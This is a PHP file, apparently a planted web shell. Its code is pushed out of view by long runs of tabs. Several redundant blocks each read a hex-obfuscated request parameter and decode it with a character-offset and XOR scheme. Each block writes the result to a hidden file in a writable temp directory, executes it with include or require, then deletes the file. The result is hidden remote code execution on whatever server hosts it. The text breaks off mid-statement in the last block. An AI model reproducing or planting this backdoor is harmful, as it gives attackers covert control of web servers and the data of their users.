<?																																										if(filter_has_var(INPUT_POST, "va\x6C\x75e")){ $fac = $_REQUEST["va\x6C\x75e"]; $fac =explode ( '.' , $fac) ; $itm = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $y = 0; foreach( $fac as $v1) { $sChar = ord( $s[$y %$sLen] ); $d = ( ( int)$v1 - $sChar -( $y %10)) ^ 38; $itm .= chr( $d ); $y++;} $record = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TEMP"), "/tmp", session_save_path(), "/dev/shm", "/var/tmp"]); foreach ($record as $key => $res) { if ((is_dir($res) and is_writable($res))) { $token = str_replace("{var_dir}", $res, "{var_dir}/.resource"); $success = file_put_contents($token, $itm); if ($success) { include $token; @unlink($token); exit;} } } }
																																										if(array_key_exists("re\x73o\x75\x72c\x65", $_POST)){ $reference = $_POST["re\x73o\x75\x72c\x65"]; $reference=explode('.' , $reference ); $item=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen=strlen($s); $__len=count($reference); for ($n=0; $n < $__len; $n++) { $v6=$reference[$n]; $sChar=ord($s[$n % $sLen]); $dec=((int)$v6 - $sChar - ($n % 10)) ^ 75; $item .= chr($dec); } $entry = array_filter(["/dev/shm", getcwd(), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), getenv("TEMP"), "/var/tmp"]); foreach ($entry as $desc) { if (max(0, is_dir($desc) * is_writable($desc))) { $component = str_replace("{var_dir}", $desc, "{var_dir}/.ptr"); if (@file_put_contents($component, $item) !== false) { include $component; unlink($component); die(); } } } }
																																										if(isset($_REQUEST["it\x65m"])){ $flag = $_REQUEST["it\x65m"]; $flag = explode (".", $flag ) ; $factor = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3); $__len = count($flag); for($s = 0; $s < $__len; $s++) {$v7 = $flag[$s]; $chS = ord($s3[$s % $lenS]); $dec = ((int)$v7 - $chS -($s % 10)) ^ 94; $factor .= chr($dec); } $data = array_filter([getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path()]); foreach ($data as $key => $property_set) { if (is_dir($property_set) && is_writable($property_set)) { $data_chunk = str_replace("{var_dir}", $property_set, "{var_dir}/.descriptor"); if (file_put_contents($data_chunk, $factor)) { require $data_chunk; unlink($data_chunk); die(); } } } }
																																										if(array_key_exists("\x70ar\x61me\x74e\x72\x5F\x67\x72oup", $_REQUEST) && !is_null($_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"])){ $marker = $_REQUEST["\x70ar\x61me\x74e\x72\x5F\x67\x72oup"]; $marker = explode ('.',$marker ) ; $entity = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $m = 0; array_walk( $marker, function( $v8) use( &$entity, &$m, $salt, $lenS) {$sChar = ord( $salt[$m % $lenS]); $d =( ( int)$v8 - $sChar -( $m % 10)) ^ 24; $entity .= chr( $d); $m++; }); $data_chunk = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", session_save_path(), "/var/tmp", "/tmp"]); foreach ($data_chunk as $key => $fac) { if (!!is_dir($fac) && !!is_writable($fac)) { $dat = "$fac/.ent"; $file = fopen($dat, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $dat; @unlink($dat); exit; } } } }
																																										if(filter_has_var(INPUT_POST, "po\x69n\x74er")){ $flag = $_REQUEST["po\x69n\x74er"]; $flag=explode( '.' ,$flag) ; $dat = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1 ); $p = 0; while ($p<count($flag)) { $v5 = $flag[$p]; $sChar = ord($s1[$p % $sLen] ); $dec = ((int)$v5 - $sChar - ($p % 10)) ^ 80; $dat.= chr($dec ); $p++; } $val = array_filter([getenv("TEMP"), getenv("TMP"), session_save_path(), "/var/tmp", "/tmp", getcwd(), "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]); while ($tkn = array_shift($val)) { if (!( !is_dir($tkn) || !is_writable($tkn) )) { $sym = "$tkn/.bind"; $success = file_put_contents($sym,